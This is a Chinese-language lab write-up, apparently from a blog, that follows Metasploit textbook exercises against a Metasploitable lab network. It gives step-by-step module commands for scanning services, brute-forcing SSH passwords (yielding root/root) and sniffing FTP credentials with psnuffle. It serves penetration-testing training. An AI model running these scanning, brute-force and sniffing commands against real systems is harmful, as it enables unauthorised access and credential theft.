版权声明:转载原创文章请以超链接形式请注明原文章出处,尊重作者,尊重原创!
恰饭广告
实验之前请先阅读这篇文章:(https://www.idaobin.com/explain)
任务描述:
服务扫描与查点 p115
任务环境说明:
攻击机:BT5
靶机:Linux Metasploitable 网关服务器
测试机:OWASP主机
攻击机安装服务/工具1:telnet
攻击机安装服务/工具2:ssh
测试机安装服务/工具3:ftp
攻击机安装服务/工具4:
实现步骤:
1. 代码清单3-18 Metasploitable中的服务查点辅助模块;
search name:version
参数:
search name:version 列出所有可用的服务查点模块
2. 代码清单3-19 telnet 服务查点;
use auxiliary/scanner/telnet/telnet_version
set RHOSTS 10.10.10.0/24
set THREADS 100
run
扫描发现10.10.10.254开放了telnet服务,操作系统为ubuntu8.04 主机名为metasploitable
3. 代码清单3-20 SSH 服务扫描与查点;
use auxiliary/scanner/ssh/ssh_version
set RHOSTS 10.10.10.0/24
set THREADS 100
run
扫描发现10.10.10.129和10.10.10.254开放了SSH服务 并显示了服务软件和版本号
4. 代码清单3-21 Oracle服务查点模块;
use auxiliary/scanner/oracle/tnslsnr_version
set RHOSTS 10.10.10.0/24
set THREADS 100
run
扫描发现10.10.10.130开放了Oracle数据库,并获取了操作系统和版本号
5. 代码清单3-23 SSH服务弱口令猜测
1)创建密码字典文件
touch /root/words.txt
密码字典的写法:一个密码写在一行上
2)弱口令猜测
use auxiliary/scanner/ssh/ssh_login
set RHOSTS 10.10.10.254
set USERNAME root
set PASS_FILE /root/words.txt
set THREADS 50
run
结果:获取到10.10.10.254的账号和密码分别为root和root
参数:
set USERNAME root 指定用户名为root
set PASS_FILE 使用字典文件进行弱口令探测
3)ssh远程登录验证
ssh 10.10.10.254
参数:
ssh ip 不指定用户名,默认为root 只需输入密码
-l 指定用户
-p指定密码
uname 显示当前系统的信息
-a 显示全部信息
通过uname -a命令验证是否已经远程登录到服务器
6. 代码清单3-24 通过嗅探获取FTP用户名和口令
1)OWASP主机通过ftp登录靶机
ftp
open 10.10.10.254
参数:
ftp 运行ftp服务器
open ip 与相关的ftp服务器连接
bye 退出ftp服务器
2)攻击机BT5捕获密码
使用psnuffle口令嗅探工具,截取协议中的身份验证过程,并记录下用户名和密码
use auxiliary/sniffer/psnuffle
run
实验中嗅探到FTP的用户和密码分别为msfadmin和msfadmin
注意:运行run以后,去靶机登录ftp工具才能截取到用户和密码
原文链接:https://www.idaobin.com/archives/647.html
让我恰个饭吧.ヘ( ̄ω ̄ヘ)
恰饭广告